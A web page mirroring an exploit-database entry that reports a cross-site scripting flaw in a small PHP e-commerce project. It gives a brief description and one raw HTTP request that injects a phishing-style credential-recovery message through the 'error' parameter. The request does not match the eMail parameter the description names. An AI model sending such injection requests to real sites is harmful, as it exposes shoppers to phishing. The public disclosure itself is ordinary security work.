Ecommerse v1.0 crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-03-30 |
Type : webapps |
Platform : php
This exploit / vulnerability Ecommerse v1.0 crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
## Description:
The value of the eMail request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can trick the users of this system, very easy to visit a
very dangerous link from anywhere, and then the game will over for
these customers.
Also, the attacker can create a network from botnet computers by using
this vulnerability.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```POST
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
## Proof and Exploit:
[href](https://streamable.com/3r4t36)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>